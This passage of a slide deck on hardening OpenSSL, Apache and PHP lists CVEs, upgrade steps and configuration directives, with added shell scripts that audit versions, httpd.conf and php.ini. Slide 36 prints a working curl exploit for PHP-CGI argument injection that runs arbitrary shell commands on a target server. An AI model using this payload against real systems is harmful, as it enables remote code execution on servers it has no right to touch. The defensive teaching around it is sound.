  • Symantec discovers a vulnerability that affects OpenSSL versions 1.0.2c, 1.0.2b, 1.0.1n, and 1.0.1o. Users of versions 1.0.2b and 1.0.2c are advised to immediately upgrade to 1.0.2d. Users of versions 1.0.1n and 1.0.1o are advised to immediately upgrade to 1.0.1p.
15. OpenSSL Installation
OpenSSL is preinstalled on a lot of operating systems.
Building is simple:
Get the source
Configure
Compile
Install
Reference the new SSL when building other products
16. OpenSSL Hardening
• Stay current
  • This is limited by other software's ability to update
• Normal network safety hardening
• There is a limit to what you can harden with OpenSSL specifically
  • OpenSSL is used to support the applications we will harden
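The "stay current" advice of slides 9 to 16 turned into a check, as an added example that is not part of the OpenLogic deck: it classifies `openssl version` output against the Heartbleed ranges stated on slide 10 (and the EOL 0.9.8 branch from slide 12), and filters `openssl ciphers -v` output for weak suites. The weak-suite pattern and the sample cipher lines are assumptions of this example, not content from the slides.

```shell
#!/bin/sh
# Added example, not part of the OpenLogic deck: classify "openssl version"
# output against the Heartbleed ranges the slide states (1.0.1 through 1.0.1f
# vulnerable; 1.0.1g, the 1.0.0 branch and the 0.9.8 branch not) and filter
# "openssl ciphers -v" output for weak suites. The weak-suite pattern is an
# assumption of this example, not a list from the slides.

# Pull the bare version ("1.0.1e") out of a line such as
# "OpenSSL 1.0.1e-fips 11 Feb 2013"; a "-fips" style suffix is dropped.
openssl_version_token() {
    set -- $1
    printf '%s\n' "${2%%-*}"
}

# Print a verdict; return 1 for the Heartbleed range, 2 for the EOL 0.9.8
# branch (slide 12: EOL Dec 2015, do not use), 0 otherwise.
heartbleed_status() {
    ver=$(openssl_version_token "$1")
    case "$ver" in
        1.0.1|1.0.1[a-f])
            echo "$ver: VULNERABLE to Heartbleed (1.0.1 through 1.0.1f): upgrade to 1.0.1g+, create new keys, reissue certs"
            return 1 ;;
        1.0.1*)  echo "$ver: not vulnerable (1.0.1g or newer)"; return 0 ;;
        1.0.0*)  echo "$ver: not vulnerable (1.0.0 branch)"; return 0 ;;
        0.9.8*)  echo "$ver: not vulnerable to Heartbleed, but 0.9.8 is EOL"; return 2 ;;
        *)       echo "$ver: outside the Heartbleed range"; return 0 ;;
    esac
}

# Keep only "openssl ciphers -v" lines naming a suite a hardening review would
# reject: NULL/export/RC4/DES (incl. 3DES)/MD5 and anonymous DH/ECDH.
weak_ciphers() {
    grep -E 'NULL|EXP|RC4|DES|MD5|ADH|AECDH'
}

# Constructed sample of "openssl ciphers -v" output, not from a real build.
sample_cipher_list() {
    cat <<'EOF'
ECDHE-RSA-AES256-GCM-SHA384 TLSv1.2 Kx=ECDH     Au=RSA  Enc=AESGCM(256) Mac=AEAD
DHE-RSA-AES128-SHA      SSLv3 Kx=DH       Au=RSA  Enc=AES(128)  Mac=SHA1
RC4-SHA                 SSLv3 Kx=RSA      Au=RSA  Enc=RC4(128)  Mac=SHA1
DES-CBC3-SHA            SSLv3 Kx=RSA      Au=RSA  Enc=3DES(168) Mac=SHA1
EXP-RC4-MD5             SSLv3 Kx=RSA(512) Au=RSA  Enc=RC4(40)   Mac=MD5  export
NULL-SHA256             TLSv1.2 Kx=RSA    Au=RSA  Enc=None      Mac=SHA256
EOF
}

# Run against the local build when one is present, then against the sample.
if command -v openssl >/dev/null 2>&1; then
    heartbleed_status "$(openssl version)" || :
    openssl ciphers -v 'ALL:COMPLEMENTOFALL' 2>/dev/null | weak_ciphers || :
fi
heartbleed_status 'OpenSSL 1.0.1e-fips 11 Feb 2013' || :
sample_cipher_list | weak_ciphers
```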
18. Apache Web Server
A community web server with prolific implementation
Current versions: 2.4.29, 2.2.34 (FINAL)
2.2 was EOL'd June 2017 with security updates to December 2017
Approx. 68 million public instances of Apache Web in use (builtwith.com)
More than 70% use vulnerable versions
19. Apache Vulnerabilities
0-DAY - WHAT IS IT?
2.2 VULNERABILITIES
OptionsBleed - CVE-2017-9798
• Ignore the .htaccess file
Uninitialized Memory Reflection - CVE-2017-9788
• Affects 2.2.0 - 2.2.32 (fixed in .34)
• Reveals confidential information
Authentication Bypass - CVE-2017-3167
20. CVE Apache 2.2.22 Vulnerability
DoS
http://www.cvedetails.com/cve/CVE-2014-0098/
http://www.cvedetails.com/cve/CVE-2013-6438/
http://www.cvedetails.com/cve/CVE-2014-0231/
http://www.cvedetails.com/cve/CVE-2013-1896/
XSS
http://www.cvedetails.com/cve/CVE-2012-4558/
http://www.cvedetails.com/cve/CVE-2012-3499/
Code-Exec
http://www.cvedetails.com/cve/CVE-2013-1862/
21. Apache 2.2 Additional Vulnerabilities
• important: Uninitialized memory reflection in mod_auth_digest (CVE-2017-9788)
• important: ap_get_basic_auth_pw() Authentication Bypass (CVE-2017-3167)
• important: mod_ssl Null Pointer Dereference (CVE-2017-3169)
• important: ap_find_token() Buffer Overread (CVE-2017-7668)
• important: mod_mime Buffer Overread (CVE-2017-7679)
• important: Apache HTTP Request Parsing Whitespace Defects (CVE-2016-8743)
• n/a: HTTP_PROXY environment variable "httpoxy" mitigation (CVE-2016-5387)
• low: HTTP request smuggling attack against chunked request parser (CVE-2015-3183)
• important: mod_cgid denial of service (CVE-2014-0231)
• low: HTTP Trailers processing bypass (CVE-2013-5704)
• moderate: mod_deflate denial of service (CVE-2014-0118)
• moderate: mod_status buffer overflow (CVE-2014-0226)
• low: mod_log_config crash (CVE-2014-0098)
• moderate: mod_dav crash (CVE-2013-6438)
• low: mod_rewrite log escape filtering (CVE-2013-1862)
• moderate: mod_dav crash (CVE-2013-1896)
• low: XSS due to unescaped hostnames (CVE-2012-3499)
• moderate: XSS in mod_proxy_balancer (CVE-2012-4558)
• low: XSS in mod_negotiation when untrusted uploads are supported (CVE-2012-2687)
  • Note: This issue is also known as CVE-2008-0455.
• low: insecure LD_LIBRARY_PATH handling (CVE-2012-0883)
• low: mod_proxy_ajp remote DoS (CVE-2012-4557)
• low: mod_setenvif .htaccess privilege escalation (CVE-2011-3607)
• low: mod_log_config crash (CVE-2012-0021)
• low: scoreboard parent DoS (CVE-2012-0031)
• moderate: mod_proxy reverse proxy exposure (CVE-2011-4317)
• moderate: error responses can expose cookies (CVE-2012-0053)
• low: mod_deflate DoS (CVE-2009-1891)
• low: AllowOverride Options handling bypass (CVE-2009-1195)
• low: CRLF injection in mod_negotiation when untrusted uploads are supported (CVE-2008-0456)
• moderate: APR-util off-by-one overflow (CVE-2009-1956)
• moderate: APR-util XML DoS (CVE-2009-1955)
• moderate: APR-util heap underwrite (CVE-2009-0023)
• important: Timeout detection flaw (mod_proxy_http) (CVE-2010-2791)
• low: mod_proxy_ftp globbing XSS (CVE-2008-2939)
• low: mod_proxy_balancer CSRF (CVE-2007-6420)
• moderate: mod_proxy_http DoS (CVE-2008-2364)
• low: mod_proxy_ftp UTF-7 XSS (CVE-2008-0005)
• low: mod_proxy_balancer DoS (CVE-2007-6422)
• low: mod_proxy_balancer XSS (CVE-2007-6421)
• moderate: mod_status XSS (CVE-2007-6388)
• moderate: mod_imagemap XSS (CVE-2007-5000)
• moderate: mod_proxy crash (CVE-2007-3847)
• moderate: mod_status cross-site scripting (CVE-2006-5752)
• moderate: Signals to arbitrary processes (CVE-2007-3304)
• moderate: mod_cache information leak (CVE-2007-1862)
• moderate: mod_cache proxy DoS (CVE-2007-1863)
• important: mod_rewrite off-by-one error (CVE-2006-3747)
• low: mod_ssl access control DoS (CVE-2005-3357)
• moderate: mod_imap Referer Cross-Site Scripting (CVE-2005-3352)
• moderate: mod_proxy_ajp remote DoS (CVE-2011-3348)
• important: Range header remote DoS (CVE-2011-3192)
  • Advisory: CVE-2011-3192.txt
• moderate: apr_fnmatch flaw leads to mod_autoindex remote DoS (CVE-2011-0419)
• low: expat DoS (CVE-2009-3720)
• low: expat DoS (CVE-2009-3560)
• low: apr_brigade_split_line DoS (CVE-2010-1623)
• important: Timeout detection flaw (mod_proxy_http) (CVE-2010-2068)
  • http://www.apache.org/dist/httpd/patches/apply_to_2.2.15/CVE-2010-2068-r953616.patch
  • http://www.apache.org/dist/httpd/patches/apply_to_2.3.5/CVE-2010-2068-r953418.patch
  • http://www.apache.org/dist/httpd/binaries/win32/mod_proxy_http-CVE-2010-2068.zip
• low: mod_cache and mod_dav DoS (CVE-2010-1452)
• important: mod_isapi module unload flaw (CVE-2010-0425)
• low: Subrequest handling of request headers (mod_headers) (CVE-2010-0434)
• moderate: mod_proxy_ajp DoS (CVE-2010-0408)
• low: mod_proxy_ftp DoS (CVE-2009-3094)
• low: mod_proxy_ftp FTP command injection (CVE-2009-3095)
• moderate: Solaris pollset DoS (CVE-2009-2699)
• low: APR apr_palloc heap overflow (CVE-2009-2412)
• important: mod_proxy reverse proxy DoS (CVE-2009-1890)
• important: mod_proxy_ajp information disclosure (CVE-2009-1191)
22. Apache - Upgrading
UPGRADE TO 2.4
Not that complicated
Most setups that run 2.2 will run 2.4
http://httpd.apache.org/docs/2.4/upgrading.html
2.2 configuration:
  Order deny,allow
  Deny from all
TO->
  Require all denied
2.2 configuration:
  Order allow,deny
  Allow from all
TO->
  Require all granted
23. Critical Apache 2.4 Vulnerabilities
• CVE-2009-1891 (CWE-399)
  • mod_deflate allowing DDoS
  • Latest affected version is 2.2.11, but there are sporadic reports on early 2.4
• CVE-2009-1890 (CWE-189)
  • mod_proxy_http allowing DDoS via CPU locking
  • Latest version 2.3.2, some reports on 2.4.0-.1
• CVE-2013-2249
  • mod_session_dbd module allowing arbitrary command execution via an HTTP request containing escape chars
  • Latest affected version 2.4.4
• CVE-2012-0883
  • envvars-std TROJAN HORSE injection
  • Version 2.4.2 is affected.
24. Hardening Apache 2
• What is hardening?
• ServerSignature
  • Turn it off
  • Prevents pages from displaying information about the server
• Turn off directory listings
  • Options
• Check for unused modules
  • httpd.conf
• Use groups / users
  • httpd.conf - User / Group
25. Hardening Apache 2 (cont.)
Use Allow and Deny on directories
• <Directory> Deny from all
Install mod_security
• yum install libapache2-modsecurity
Use mod_evasive
Disable symlinks
• -FollowSymLinks
Turn off server-side includes
• -Includes
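The migration rule of slide 22 and the hardening items of slides 24 and 25 as one audit over an httpd.conf, an added example that is not part of the OpenLogic deck: it reports 2.2-era Order/Allow/Deny lines that must become Require on 2.4, ServerSignature not Off, and Options that grant Indexes, FollowSymLinks or Includes. The ServerTokens check and the sample configuration are assumptions of this example.

```shell
#!/bin/sh
# Added example, not part of the OpenLogic deck: audit an httpd.conf (read on
# stdin) for what the upgrade and hardening slides call out - 2.2-era
# Order/Allow/Deny access control that becomes Require on 2.4, ServerSignature
# left on, and Options that grant Indexes, FollowSymLinks or Includes.
# ServerTokens is a companion check that the slides do not name.

# Print one finding per line; return 1 when there is at least one finding.
audit_httpd_conf() {
    awk '
    function finding(msg) { printf "line %d: %s\n", NR, msg; bad++ }
    # strip comments and surrounding whitespace; compare case-insensitively
    { line = $0; sub(/#.*/, "", line); gsub(/^[ \t]+|[ \t]+$/, "", line); low = tolower(line) }
    line == "" { next }
    # slide 22: 2.2 access control -> Require
    low ~ /^order[ \t]/             { finding("\"" line "\" is 2.2 syntax, drop it and use Require"); next }
    low ~ /^allow from all$/        { finding("\"" line "\" -> Require all granted"); next }
    low ~ /^deny from all$/         { finding("\"" line "\" -> Require all denied"); next }
    low ~ /^(allow|deny) from[ \t]/ { finding("\"" line "\" -> rewrite with Require ip / Require host"); next }
    # slide 24: stop advertising the server
    low ~ /^serversignature[ \t]/ && low !~ /[ \t]off$/ { finding("ServerSignature is not Off"); next }
    low ~ /^servertokens[ \t]/ && low !~ /[ \t]prod$/   { finding("ServerTokens is not Prod"); next }
    # slides 24-25: directory listings, symlinks, server-side includes
    low ~ /^options([ \t]|$)/ {
        n = split(line, w, /[ \t]+/)
        for (i = 2; i <= n; i++) {
            opt = w[i]; sub(/^\+/, "", opt)
            if (tolower(opt) ~ /^(all|indexes|followsymlinks|includes)$/) finding("Options grants " opt)
        }
        next
    }
    END { exit (bad > 0) }
    '
}

# Constructed sample of a 2.2-era configuration, not a real server's file.
sample_httpd_conf() {
    cat <<'EOF'
ServerSignature On
ServerTokens Full
<Directory "/var/www/html">
    Options Indexes FollowSymLinks
    AllowOverride None
    Order allow,deny
    Allow from all
</Directory>
<Directory "/var/www/private">
    Options -Indexes -FollowSymLinks -Includes
    Order deny,allow
    Deny from all
</Directory>
EOF
}

# Usage: audit_httpd_conf < /etc/httpd/conf/httpd.conf; the sample below
# produces eight findings.
sample_httpd_conf | audit_httpd_conf || echo "fix the findings above, then re-run"
```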
26. PHP
27. PHP 5-7
PHP is in use everywhere
PHP 5 has over 500 vulnerabilities (Mitre.org)
Upgrade to PHP 7
Lots of information on migration: http://php.net/manual/en/migration70.php
If you have to use 5, harden it
28. Remote Code Execution Vulnerability
• Affected Versions
  • 7.3 to 7.3.10
• What is it?
  • Allows an attacker to execute remote code to gain control of system data
• How?
  • Bug #78559 (Heap Buffer Overflow in mb_eregi)
• Mitigation
  • Upgrade to 7.4
  • Apply security hardening principles, like least privilege
• Exploits
  • No current exploits known; that does not mean they don't exist
29. PHP 5.5.9 Exploit - Moadmin
• Mongo admin tool
• Allows execution of code
• Not PHP's fault
• Large negative impact
30. Hardening PHP
Prevent fopen wrappers
• allow_url_fopen
Limit process time / input time
• max_input_time
• max_execution_time
Limit script memory
• memory_limit
Turn register globals off
• register_globals

31. Hardening PHP
Don't expose PHP in the response
• expose_php
Only use redirect
• cgi.force_redirect
Impose input restrictions
• post_max_size
• max_input_vars
Do not display error information
• display_errors=0
• display_startup_errors

32. Hardening PHP
Logging
• log_errors=1
• error_log = <path>
Restrict file access
• open_basedir = <path>
File uploads
• file_uploads = 0 <or> upload_max_filesize = 1M
Session security
Cookie security
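The directives of the three "Hardening PHP" slides as one php.ini audit, an added example that is not part of the OpenLogic deck: each slide item becomes a check, and the sample php.ini is a constructed one, not a real server's file. Session and cookie security are listed on the slide without directives and are not checked.

```shell
#!/bin/sh
# Added example, not part of the OpenLogic deck: check a php.ini (read on
# stdin) against the directives the three "Hardening PHP" slides list. Each
# finding is one line; the return status is 1 when anything was found.
# Parsing is deliberately simple: "key = value", ";" comments, [sections].

audit_php_ini() {
    awk '
    function is_on(v) { v = tolower(v); return (v == "1" || v == "on" || v == "true" || v == "yes") }
    function want_off(k) {
        if (!(k in cfg))        { print k " is not set explicitly; add " k " = Off"; bad++ }
        else if (is_on(cfg[k])) { print k " is On; set it Off"; bad++ }
    }
    function want_on(k)  { if (!(k in cfg) || !is_on(cfg[k])) { print k " is not On; set " k " = On"; bad++ } }
    function want_set(k) { if (!(k in cfg) || cfg[k] == "")   { print k " is not set"; bad++ } }
    { sub(/;.*/, ""); gsub(/^[ \t]+|[ \t]+$/, "") }
    $0 == "" || /^\[/ { next }
    {
        eq = index($0, "="); if (eq == 0) next
        k = tolower(substr($0, 1, eq - 1)); v = substr($0, eq + 1)
        gsub(/[ \t]+$/, "", k); gsub(/^[ \t]+/, "", v); gsub(/^"|"$/, "", v)
        cfg[k] = v
    }
    END {
        want_off("allow_url_fopen")                                   # slide 30: fopen wrappers
        want_set("max_input_time"); want_set("max_execution_time")    # slide 30: time limits
        want_set("memory_limit")                                      # slide 30: script memory
        # register_globals was removed in PHP 5.4; only flag a 5.x install that still turns it on
        if (("register_globals" in cfg) && is_on(cfg["register_globals"])) { print "register_globals is On; set it Off"; bad++ }
        want_off("expose_php")                                        # slide 31
        want_on("cgi.force_redirect")                                 # slide 31
        want_set("post_max_size"); want_set("max_input_vars")         # slide 31: input restrictions
        want_off("display_errors"); want_off("display_startup_errors")  # slide 31
        want_on("log_errors"); want_set("error_log")                  # slide 32: logging
        want_set("open_basedir")                                      # slide 32: restrict file access
        # slide 32: disable uploads, or cap their size
        if ((!("file_uploads" in cfg) || is_on(cfg["file_uploads"])) && !("upload_max_filesize" in cfg)) {
            print "file_uploads is enabled with no upload_max_filesize cap"; bad++
        }
        exit (bad > 0)
    }
    '
}

# Constructed sample php.ini, not from a real server.
sample_php_ini() {
    cat <<'EOF'
[PHP]
; constructed sample: three directives left at exposing values, no open_basedir
expose_php = On
allow_url_fopen = On
register_globals = Off
display_errors = 1
display_startup_errors = Off
log_errors = On
error_log = "/var/log/php_errors.log"
cgi.force_redirect = 1
max_execution_time = 30
max_input_time = 60
memory_limit = 128M
post_max_size = 8M
max_input_vars = 1000
file_uploads = On
upload_max_filesize = 1M
EOF
}

# Usage: audit_php_ini < /usr/local/php7/etc/php.ini; the sample has four findings.
sample_php_ini | audit_php_ini || echo "fix the findings above, then re-run"
```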
33. Building PHP 7
• sudo yum install git gcc gcc-c++ libxml2-devel pkgconfig openssl-devel bzip2-devel curl-devel libpng-devel libjpeg-devel libXpm-devel freetype-devel gmp-devel libmcrypt-devel mariadb-devel aspell-devel recode-devel autoconf bison re2c libicu-devel
• (Possibly) yum install bison
• sudo mkdir /usr/local/php7
• git clone https://github.com/php/php-src.git
• cd php-src
• git checkout PHP-7.4.9
• ./buildconf --force
• ./configure --prefix=/usr/local/php7 --with-config-file-path=/usr/local/php7/etc --with-config-file-scan-dir=/usr/local/php7/etc/conf.d --enable-bcmath --with-bz2 --with-curl --enable-filter --enable-fpm --with-gd --enable-gd-native-ttf --with-freetype-dir --with-jpeg-dir --with-png-dir --enable-intl --enable-mbstring --with-mcrypt --enable-mysqlnd --with-mysql-sock=/var/lib/mysql/mysql.sock --with-mysqli=mysqlnd --with-pdo-mysql=mysqlnd --with-pdo-sqlite --disable-phpdbg --disable-phpdbg-webhelper --enable-opcache --with-openssl --enable-simplexml --with-sqlite3 --enable-xmlreader --enable-xmlwriter --enable-zip --with-zlib
• make && make install
34. Building PHP 7
HOW TO BUILD
• Get the source
• Get the dependencies
• Grab additional files for anything you want to enable
• ./configure --help is your friend
• Ask Perforce experts
35. A Note About CGI Mode
What is it? A mode to serve (interpret) pages without a web server.
"Secure": this is supposed to be secure.
36. Why CGI Mode is NOT Secure
Remote Code Execution: you are inviting this sort of attack.
Common Exploits: there are several common exploits to take advantage of this.
curl -i -s -k -X 'POST' -H 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)' --data-binary "<?php system("$2"); die; ?>" "http://$1/cgibin/php5?%2dd+allow_url_include%3don+%2dd+safe_mode%3doff+%2dd+suhosin%2esimulation%3don+%2dd+disable_functions%3d%22%22+%2d d+open_basedir%3dnone+%2dd+auto_prepend_file%3dphp%3a%2f%2finput+%2dd+cgi%2eforce_redirect%3d0+%2dd+cgi%2eredirect_status_env%3d0+%2dn"
37. Hardening
• The web is your friend!!!
• Anti-clickjacking and other practices
  • https://geekflare.com/10-best-practices-to-secure-and-harden-your-apache-web-server/f
• Linux hardening of Apache
  • https://wiki.debian.org/Apache/Hardening
• PHP hardening
  • http://www.hardened-php.net/
38. Q & A